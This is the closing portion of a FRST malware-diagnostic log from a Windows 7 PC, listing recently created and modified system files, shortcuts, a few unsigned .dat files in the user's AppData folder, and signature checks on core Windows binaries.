    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 21:54 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-19 21:09 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 21:09 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 20:59 - 2009-07-14 01:13 - 00790438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-19 20:59 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-19 03:11 - 2016-06-22 14:58 - 00000000 ____D C:\Users\SUPERDelete
    2016-09-19 03:08 - 2009-07-13 22:34 - 00000215 _____ C:\WINDOWS\system.ini
    2016-09-19 03:02 - 2016-01-29 17:35 - 00774756 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-18 20:43 - 2016-06-22 14:51 - 00001066 _____ C:\Users\Public\Desktop\VLC media player.lnk
    2016-09-18 20:43 - 2016-01-29 19:03 - 00002189 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002451 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002415 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002409 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002373 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002372 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002366 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002360 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002352 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
    2016-09-18 20:43 - 2016-01-21 19:43 - 00001015 _____ C:\Users\Administrator\Desktop\Virtual Moon Atlas.lnk
    2016-09-18 20:43 - 2016-01-21 15:55 - 00001852 _____ C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
    2016-09-18 20:43 - 2016-01-21 15:52 - 00001764 _____ C:\Users\Public\Desktop\Stellarium v14.2.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
    2016-09-18 20:43 - 2009-07-14 01:01 - 00001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001340 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
    2016-09-18 20:43 - 2009-07-14 00:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
    2016-09-18 20:43 - 2009-07-14 00:49 - 00001266 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
    2016-09-18 20:40 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\ModemLogs
    2016-09-18 10:24 - 2016-01-21 17:57 - 00000000 ____D C:\Users\Administrator\AppData\Local\ElevatedDiagnostics
    2016-09-18 10:24 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-09-18 07:44 - 2016-06-22 14:52 - 00000000 ____D C:\Users\Administrator\AppData\Roaming\vlc
    2016-09-17 15:57 - 2016-01-21 15:50 - 00000000 ____D C:\Frank
    2016-09-17 15:11 - 2016-06-20 18:06 - 00000000 ____D C:\0000 decripted
    2016-09-16 21:45 - 2016-01-29 18:52 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2016-09-16 21:44 - 2016-01-29 18:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2016-09-16 21:25 - 2016-06-22 14:51 - 00000000 ____D C:\Users\Administrator\AppData\Local\Chromium
    2016-09-16 21:25 - 2009-07-13 23:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
    2016-09-16 21:14 - 2009-07-14 00:45 - 00438496 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2016-09-16 19:51 - 2016-06-22 15:50 - 00000138 _____ C:\Users\Administrator\AppData\Roaming\WB.CFG
    2016-09-16 10:53 - 2016-01-21 18:08 - 00111536 _____ C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
    2016-09-14 04:29 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\rescache
    2016-09-13 17:22 - 2016-01-29 20:30 - 00000000 ____D C:\WINDOWS\system32\appraiser
    2016-09-13 17:22 - 2016-01-21 15:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware

    ==================== Files in the root of some directories =======

    2016-09-18 08:03 - 2016-09-18 08:04 - 7090176 _____ () C:\Users\Administrator\AppData\Roaming\agent.dat
    2016-09-18 08:01 - 2016-09-18 08:01 - 0140288 _____ () C:\Users\Administrator\AppData\Roaming\Installer.dat
    2016-09-18 08:03 - 2016-09-18 08:04 - 0018432 _____ () C:\Users\Administrator\AppData\Roaming\Main.dat
    2016-06-22 15:50 - 2016-09-16 19:51 - 0000138 _____ () C:\Users\Administrator\AppData\Roaming\WB.CFG

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-09-13 17:53

    ==================== End of FRST.txt ============================